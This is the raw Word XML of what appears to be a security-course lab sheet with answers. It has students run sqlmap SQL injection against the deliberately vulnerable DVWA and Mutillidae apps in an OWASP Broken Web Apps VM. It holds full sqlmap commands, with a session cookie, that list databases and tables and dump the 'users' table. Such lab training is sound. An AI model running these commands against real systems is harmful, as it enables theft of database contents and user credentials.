                  <wp:extent cx="5732145" cy="4078605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07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586F5" w14:textId="77777777" w:rsidR="005B438C" w:rsidRPr="005B438C" w:rsidRDefault="005B438C" w:rsidP="005B438C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2367276" w14:textId="77777777" w:rsidR="008460C9" w:rsidRPr="002135A4" w:rsidRDefault="008460C9" w:rsidP="008460C9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002135A4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B712F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Contd.,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135A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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2135A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1CDB1" w14:textId="77777777" w:rsidR="008460C9" w:rsidRDefault="008460C9" w:rsidP="008460C9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4CCDB51" w14:textId="77777777" w:rsidR="008460C9" w:rsidRDefault="008460C9" w:rsidP="008460C9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803E7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshots must show the Host OS (Windows 10) Current Date &amp; Time. </w:t>
      </w:r>
      <w:r w:rsidRPr="00803E7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Use “Print Screen” key on your keyboard to capture the entire screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2317AC6F" w14:textId="77777777" w:rsidR="008460C9" w:rsidRPr="008460C9" w:rsidRDefault="008460C9" w:rsidP="008460C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5F6163B" w14:textId="399E99AA" w:rsidR="005B438C" w:rsidRDefault="005B438C" w:rsidP="00431D23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e sqlmap tool </w:t>
      </w:r>
      <w:r w:rsidR="000D3623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to carryout SQL Injection attack on mutillidae </w:t>
      </w:r>
      <w:r w:rsidR="000D3623" w:rsidRPr="000D3623">
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="000D3623">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidR="009C5B79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-info.php page under the OWASP Broken Web Apps (owaspbwa). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E863B32" w14:textId="6183D4F6" w:rsidR="005B438C" w:rsidRDefault="005B438C" w:rsidP="006B0AA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DC0655" w14:textId="6FE89CFB" w:rsidR="006B0AA2" w:rsidRPr="00EC15D7" w:rsidRDefault="005D791B" w:rsidP="00587C1E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DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Provide screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> displaying the list of </w:t>
      </w:r>
      <w:r w:rsidR="00FF5290">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">all the </w:t>
      </w:r>
      <w:r w:rsidR="00210B3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">databases supported by the database server hosted in the </w:t>
      </w:r>
      <w:r w:rsidR="00B82B24">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Broken Web Apps </w:t>
      </w:r>
      <w:r w:rsidR="00210B3B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="00862BB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> v1.2</w:t>
      </w:r>
      <w:r w:rsidR="007313CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007313CD" w:rsidRPr="00D4003E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You may use the results generated previously</w:t>
      </w:r>
      <w:r w:rsidR="00503DB8" w:rsidRPr="00D4003E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in class</w:t>
      </w:r>
      <w:r w:rsidR="007313CD" w:rsidRPr="00D4003E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, no need to </w:t>
      </w:r>
      <w:r w:rsidR="00D4003E" w:rsidRPr="00D4003E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="00587C1E" w:rsidRPr="00D4003E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap scanning from scratch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2637A8" w14:textId="12E6C3AA" w:rsidR="00EC15D7" w:rsidRPr="00EC15D7" w:rsidRDefault="00EC15D7" w:rsidP="00EC15D7">
      <w:pPr>
        <w:spacing w:after="0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312B5D" w14:paraId="17F92037" w14:textId="77777777" w:rsidTr="005034AE">
        <w:trPr>
          <w:trHeight w:val="1139"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5EE5D8" w14:textId="10AB013E" w:rsidR="00F7576F" w:rsidRDefault="00F7576F" w:rsidP="00F7576F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo sqlmap -u </w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>http://192.168.37.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit</w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> --cookie=</w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>security=low; dbx-postmeta=grabit=0-,1-,2-,3-,4-,5-,6-&amp;advancedstuff=0-,1-,2-; acopendivids=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>swingset,jotto</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=frk0080d9gk1f5or3vdopo57q4</w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="0065433C">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> --random-agent --keep-alive --timeout 100 </w:t>
            </w:r>
            <w:r w:rsidR="0064072F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00E64082">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dbs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F3F56A8" w14:textId="0CAB8F0B" w:rsidR="0064072F" w:rsidRDefault="0064072F" w:rsidP="00F7576F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C9B431B" w14:textId="4863B831" w:rsidR="005E0AB7" w:rsidRDefault="00B7043D" w:rsidP="00F7576F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="349E0020" wp14:editId="2C779AAD">
                  <wp:extent cx="5731510" cy="1739265"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="37" name="Picture 3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4EF33" w14:textId="77777777" w:rsidR="00312B5D" w:rsidRDefault="00312B5D" w:rsidP="00474A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FB967" w14:textId="77777777" w:rsidR="00474AF3" w:rsidRPr="00474AF3" w:rsidRDefault="00474AF3" w:rsidP="00474AF3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DBB33BE" w14:textId="47E785E8" w:rsidR="00474AF3" w:rsidRDefault="00931593" w:rsidP="00931593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p w14:paraId="1808E216" w14:textId="77777777" w:rsidR="00931593" w:rsidRPr="00B7043D" w:rsidRDefault="00931593" w:rsidP="00B7043D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CAB5B6E" w14:textId="6A4A0DB7" w:rsidR="003F339C" w:rsidRDefault="00D9606A" w:rsidP="00587C1E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qlmap to extract the Column Names in the </w:t>
      </w:r>
      <w:r w:rsidR="00474AF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Table “</w:t>
      </w:r>
      <w:r w:rsidR="004854C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00045DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sers” </w:t>
      </w:r>
      <w:r w:rsidR="004854C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in the dvwa database. </w:t>
      </w:r>
      <w:r w:rsidR="00474AF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide screenshot </w:t>
      </w:r>
      <w:r w:rsidR="00474AF3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474AF3" w:rsidRPr="003F339C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00474AF3" w:rsidRPr="0046656E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sqlmap command used and its output</w:t>
      </w:r>
      <w:r w:rsidR="00474AF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E44BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561D96F" w14:textId="3D8438CD" w:rsidR="00BD17FB" w:rsidRDefault="00931593" w:rsidP="00931593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5034AE" w14:paraId="42B839A9" w14:textId="77777777" w:rsidTr="005034AE">
        <w:trPr>
          <w:trHeight w:val="1104"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8596" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031358DB" w14:textId="18448B20" w:rsidR="00B7043D" w:rsidRDefault="00B7043D" w:rsidP="00B7043D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo sqlmap -u </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3D07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>http://192.168.37.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3D07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> --cookie=</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3D07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>security=low; dbx-postmeta=grabit=0-,1-,2-,3-,4-,5-,6-&amp;advancedstuff=0-,1-,2-; acopendivids=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>swingset,jotto</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=frk0080d9gk1f5or3vdopo57q4</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB3D07">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> --random-agent --keep-alive --timeout 100 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D85888">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-D dvwa</w:t>
            </w:r>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>--tables</w:t>
            </w:r>
            <w:r w:rsidRPr="00C1755E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1899FBA2" w14:textId="18BC27DA" w:rsidR="00B7043D" w:rsidRDefault="00B7043D" w:rsidP="00B7043D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0551A300" w14:textId="6B392678" w:rsidR="00B7043D" w:rsidRDefault="00000276" w:rsidP="00B7043D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"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85BC50" wp14:editId="47960022">
                  <wp:extent cx="5110316" cy="1922172"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="39" name="Picture 3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16" cy="192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D66A9" w14:textId="6CFEB930" w:rsidR="005034AE" w:rsidRDefault="005034AE" w:rsidP="005034AE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83E8AB" w14:textId="77777777" w:rsidR="005034AE" w:rsidRPr="00BD17FB" w:rsidRDefault="005034AE" w:rsidP="005034AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BB2AB2" w14:textId="35FD0AEF" w:rsidR="00BD17FB" w:rsidRDefault="00BD17FB" w:rsidP="00587C1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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sqlmap to </w:t>
      </w:r>
      <w:r w:rsidR="007C7D03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dump records in the Table “users” </w:t>
      </w:r>
      <w:r w:rsidR="007C7D03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in the dvwa database. </w:t>
      </w:r>
      <w:r w:rsidR="007C7D03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide screenshot </w:t>
      </w:r>
      <w:r w:rsidR="007C7D03" w:rsidRPr="00DE2EF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>highlighting</w:t>
      </w:r>
      <w:r w:rsidR="007C7D03" w:rsidRPr="003F339C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="007C7D03" w:rsidRPr="00FA5C28">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sqlmap command used and its output</w:t>
      </w:r>
      <w:r w:rsidR="007C7D03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008E44BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7D37E" w14:textId="06AE6A97" w:rsidR="006B0AA2" w:rsidRDefault="003F339C" w:rsidP="00931593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31593">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(3 marks)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5034AE" w14:paraId="4D70E60A" w14:textId="77777777" w:rsidTr="00B17702">
        <w:trPr>
          <w:trHeight w:val="1103"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8596" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01567D24" w14:textId="326578E1" w:rsidR="007D52DC" w:rsidRDefault="007D52DC" w:rsidP="007D52DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D85888">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>sudo sqlmap -u "http://192.168.37.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="security=low; dbx-postmeta=grabit=0-,1-,2-,3-,4-,5-,6-&amp;advancedstuff=0-,1-,2-; acopendivids=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D85888">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>swingset,jotto</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D85888">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=frk0080d9gk1f5or3vdopo57q4" --random-agent --keep-alive --timeout 100 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4939">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">-D dvwa -T users </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA4939">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>dump</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79DB2454" w14:textId="670DAD7D" w:rsidR="007D52DC" w:rsidRDefault="007D52DC" w:rsidP="007D52DC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12C581BC" w14:textId="1BAD79E4" w:rsidR="007D52DC" w:rsidRDefault="00167519" w:rsidP="007D52DC">
